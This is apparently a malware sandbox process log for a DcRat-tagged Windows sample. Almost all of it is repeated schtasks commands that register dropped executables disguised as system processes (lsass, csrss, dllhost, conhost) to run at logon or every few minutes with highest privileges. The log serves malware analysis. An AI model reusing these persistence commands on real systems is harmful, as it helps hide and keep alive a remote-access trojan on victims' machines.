C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2624
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1332
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1576
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:300
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2336
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1828
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1748
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:856
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2148
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1852
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:156
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2488
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1344
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:936
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:300
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2028
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2948
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2408
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1848
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2504
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1940
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1576
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /f1⤵
- Process spawned unexpected child process
PID:1668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1716
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2280
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /f1⤵
- Process spawned unexpected child process
PID:1680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2548
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 9 /tr "'C:\winNet\Bloxstrap.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 10 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\audiodg.exe'" /f1⤵
- Process spawned unexpected child process
PID:1820
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1868
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\winNet\lsm.exe'" /f1⤵
- Process spawned unexpected child process
PID:1928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1676
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /f1⤵
- Process spawned unexpected child process
PID:2876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\winNet\wscript.exe'" /f1⤵
- Process spawned unexpected child process
PID:2580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2524
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2228
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
PID:1916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1912
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\system32\MsiExec.exeC:\Windows\system32\MsiExec.exe -Embedding 85A41532DC1B4ED986F185DC47A3340F2⤵
- Loads dropped DLL
PID:2620
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9924FCA711D0C7FDDBC022E9B16DDBDF2⤵
- Loads dropped DLL
PID:1864
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /f1⤵
- Process spawned unexpected child process
PID:2068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /f1⤵
- Process spawned unexpected child process
PID:2148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\winNet\lsass.exe'" /f1⤵
- Process spawned unexpected child process
PID:904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /f1⤵
- Process spawned unexpected child process
PID:1548
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:968
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /f1⤵
- Process spawned unexpected child process
PID:2504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /f1⤵
- Process spawned unexpected child process
PID:2856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f1⤵PID:2496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\msiexec.exe'" /f1⤵PID:688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f1⤵PID:1648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f1⤵PID:1584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /f1⤵PID:2620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f1⤵PID:2540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f1⤵PID:1608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 7 /tr "'C:\winNet\sddsfsdf.exe'" /f1⤵PID:1688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f1⤵PID:684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 10 /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f1⤵PID:2196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /f1⤵PID:2608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f1⤵PID:992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f1⤵PID:2108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f1⤵PID:2992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f1⤵PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f1⤵PID:904
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1451802786-450524094-15654959291856616033-8165324015582428211873060891409845559"1⤵PID:2972
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1240033177-1087581127-52718330253047587052423637-105435632017827248901758497198"1⤵PID:1724
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "434171039490841803-659286136170842003317782336711507689689-864061186-1185069012"1⤵PID:1680
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "210418219-5002661294701329731368471238-522211457-8196399031202507616-1462984557"1⤵PID:2012
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "897362320-41934790-91102571416317546481911294881-9260774479988698511668435757"1⤵PID:2572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /f1⤵PID:1972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f1⤵PID:2044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\dllhost.exe'" /f1⤵
- DcRat
PID:916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f1⤵PID:2644
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f1⤵PID:2248
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /f1⤵PID:2212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f1⤵PID:1900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f1⤵PID:2148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /f1⤵PID:2900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f1⤵PID:2588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f1⤵PID:1664
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f1⤵PID:2844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\winNet\spoolsv.exe'" /f1⤵PID:1380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f1⤵PID:1436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f1⤵PID:2340
-
